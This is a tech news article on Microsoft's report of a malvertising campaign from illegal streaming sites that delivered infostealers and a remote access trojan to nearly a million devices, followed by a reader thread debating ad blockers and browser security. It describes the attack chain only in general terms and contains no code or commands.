Microsoft: nearly one million devices hit by malware spread through ads on illegal streaming websites

midian182

midian182

Posts: 10,633   +141
Staff member
In brief: If you're going to visit websites that host pirated video streams, you'd better be willing to accept the risks. That's something owners of the one million devices affected by a malware campaign originating from these sites might not have considered.

Microsoft writes that its threat analysis team detected a large-scale malvertising campaign that impacted nearly one million devices globally in December 2024.

The company traced the attack back to two illegal streaming websites – movies7 and 0123movie – embedded with malvertising redirectors. Attackers injected the ads into videos the sites hosted. These generated pay-per-view or pay-per-click revenue from malvertising platforms and subsequently routed traffic through one or two additional malicious redirectors.

Victims were eventually led to another website, such as a tech support scam website, which then redirected to GitHub.

The GitHub repositories, which have since been taken down, stored malware used to deploy additional malicious files and scripts. Once someone had downloaded the malware, it was used to collect system information and deploy second-stage payloads to exfiltrate documents and data.

A third-stage PowerShell script payload then downloaded the NetSupport remote access trojan (RAT) from a command-and-control server and set persistence in the registry. The RAT could deliver the Lumma information stealer malware or an updated version of the Doenerium infostealer.

The malware also allowed attackers to spy a on victims' browsing activity and even interact with an active browser, including Firefox, Chrome, and Edge.

The first-stage payloads were digitally signed with a newly created certificate and included some legitimate files to hide their true nature. A total of twelve different certificates were identified, all of which were later revoked.

While GitHub was the primary platform used in the delivery of these payloads, Microsoft also found one payload hosted on Discord and another on Dropbox. As with GitHub, the pages that hosted the malware on these platforms have been removed.

Microsoft writes that the campaign was indiscriminate in nature, impacting both consumer and enterprise devices. It also notes that Windows' Microsoft Defender software is able to detect and flag the malware used in the attack.

Permalink to story:

Microsoft: nearly one million devices hit by malware spread through ads on illegal streaming websites

 
Actually the headline should be 'Google's war on ad blockers via Manifest V3 is paying off: millions infected with malware through ads' Since that's the gist of it: If you refuse to run Linux, this news is why you should at least exclusively use Firefox with uBlock Origin instead of chrome or edge or some other browser that still supports Manifest V2 and effective ad blocking
 
  • Like
Reactions: Win7user, m3tavision, Branch and 5 others
Dimitriid said:
Actually the headline should be 'Google's war on ad blockers via Manifest V3 is paying off: millions infected with malware through ads' Since that's the gist of it: If you refuse to run Linux, this news is why you should at least exclusively use Firefox with uBlock Origin instead of chrome or edge or some other browser that still supports Manifest V2 and effective ad blocking
Click to expand...

A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS Devs. I'd go with Source Available Chromium based browser that still let's you run Ublock Origin if you need that or you can still use basic Ublock which only takes away customization. Especially now that Mozilla has shown their cards that they intend to make Firefox spyware. Personally I'm sticking with Brave for now. If they don't ever allow rewards to go to a self-hosted wallet, I'll probably switch to Ladybird when that comes out, but that's a few years away.
 
disinfect8280 said:
A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS Devs. I'd go with Source Available Chromium based browser that still let's you run Ublock Origin if you need that or you can still use basic Ublock which only takes away customization. Especially now that Mozilla has shown their cards that they intend to make Firefox spyware. Personally I'm sticking with Brave for now. If they don't ever allow rewards to go to a self-hosted wallet, I'll probably switch to Ladybird when that comes out, but that's a few years away.
Click to expand...
The GrapheneOS devs also have a long history of attacking other projects and defending their own work with the fervor of a savior complex. Take what they say with a grain of salt.
 
ZedRM said:
What Microsoft conveniently left out is that this same malware and one of it's derivatives spread through legit ad networks too, including those served by it's own Bing.


Lovely sarcasm! You know they're not far from the truth though.
Click to expand...
Exactly why I am never not blocking ads (and do not use Microsoft OS or software except as required for my job). Some say it's immoral. I say the ads themselves are immoral. This is a perfect example. Not only that, they are used for tracking and profiling you and all other various nefarious activities. Need to make money? Not my problem, figure out another way instead of supporting a malicious and immoral industry.
 
  • Like
Reactions: ZedRM
Theinsanegamer said:
The GrapheneOS devs also have a long history of attacking other projects and defending their own work with the fervor of a savior complex. Take what they say with a grain of salt.
Click to expand...
Yeah I've seen some non-people friendly reactions from them in the past. I think they've chilled out recently. I've looked into other OS and tried a couple and now settled on GrapheneOS. I believe they are correct, but are simply rough around the edges when dealing with people. Many gifted people in technical fields are that way. Linus Torvalds is another example.
 
disinfect8280 said:
A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS Devs.
Click to expand...
And a lot of people still think the world is flat and that the Sun orbits the Earth. People think a lot of brain-dead ideas are true.
 
Last edited:
ZedRM said:
And a lot of people still thing the world is flat and that the Sun orbits the Earth. People think a lot of brain-dead ideas are true.
Click to expand...
Fair enough, but I would hardly categorize the GrapheneOS devs with flat-earthers. They may be a bit in the weeds worried about something that can not be exploited in the real world. I don't know. I'm on the fence. Except I am off the fence for other reasons, notably their new TOS/Privacy policy. I can't say I've seen any reporting of major Firefox exploits in the wild in the recent past. (Their uber-paranoia is why I want them working on my OS however)
 
disinfect8280 said:
Fair enough, but I would hardly categorize the GrapheneOS devs with flat-earthers.
Click to expand...
Maybe not, but that doesn't make them experts on what is and is not secure. If Firefox had ANY actual and real security vulnerabilities, the security community would be blowing their doors down about it. That isn't happening. Sure, there are some complainers, but there always are.

FireFox is THE most secure browser on Earth and by a fair margin. Chrome and Edge are not.

disinfect8280 said:
Except I am off the fence for other reasons, notably their new TOS/Privacy policy.
Click to expand...
That is an example of people not understanding the purpose of the new TOS. Mozilla has been required to reword it as a way of covering their backside due to people trying to blame and hold them libel them for things browser USERS are doing, in addition to new laws going into effect that cover "certain" internet related "activities".

It's insane and brainless, but people are trying it and governments are doing it, so Mozilla had to adapt and change the language of their TOS. Anyone who doesn't understand this is ignorant to reality and the world we live in where everyone tries to blame everyone else for their brainless activities and governments try to hold uninvolved parties responsible for things they did not do.
 
Last edited:
Got, Acronis True Image? Do you use a portable edition of Firefox? Got a good antivirus program? I, have gotten a virus a few times, (in 26 yrs using computers) and also redirection problems in Firefox. But, I have the above, so I can go back a day, two, days, a week, in an hour or so. Problem, solved.
 
Win7user said:
Got, Acronis True Image? Do you use a portable edition of Firefox? Got a good antivirus program? I, have gotten a virus a few times, (in 26 yrs using computers) and also redirection problems in Firefox. But, I have the above, so I can go back a day, two, days, a week, in an hour or so. Problem, solved.
Click to expand...
What was that and who were you talking too?
 
ZedRM said:
That is an example of people not understanding the purpose of the new TOS. Mozilla has been required to reword it as a way of covering their backside due to people trying to blame and hold them libel them for things browser USERS are doing, in addition to new laws going into effect that cover "certain" internet related "activities".

It's insane and brainless, but people are trying it and governments are doing it, so Mozilla had to adapt and change the language of their TOS. Anyone who doesn't understand this is ignorant to reality and the world we live in where everyone tries to blame everyone else for their brainless activities and governments try to hold uninvolved parties responsible for things they did not do.
Click to expand...
I hope you are right. Time will tell.
 
disinfect8280 said:
I hope you are right. Time will tell.
Click to expand...
Read the new TOS for yourself.

And if someone thinks these new terms are anywhere close to the kind of invasiveness of Edge or Chrome, then they've missed something very important or they're just fanboying. People need to take time to research and understand things before knee jerk over-reacting.
 
You must log in or register to reply here.

Similar threads

S
Apple races to shift iPhone production for the US to India by 2026
Replies
17
Views
131
Nobina
Nobina
Daniel Sims
Global server market revenue nearly doubled in 2024 with Nvidia's continued dominance
Replies
1
Views
128
daffy duck
D
midian182
Nvidia CEO Jensen Huang gets first pay raise in a decade, now earns $49.8 million
Replies
19
Views
110
BogdanR
BogdanR

Latest posts

Back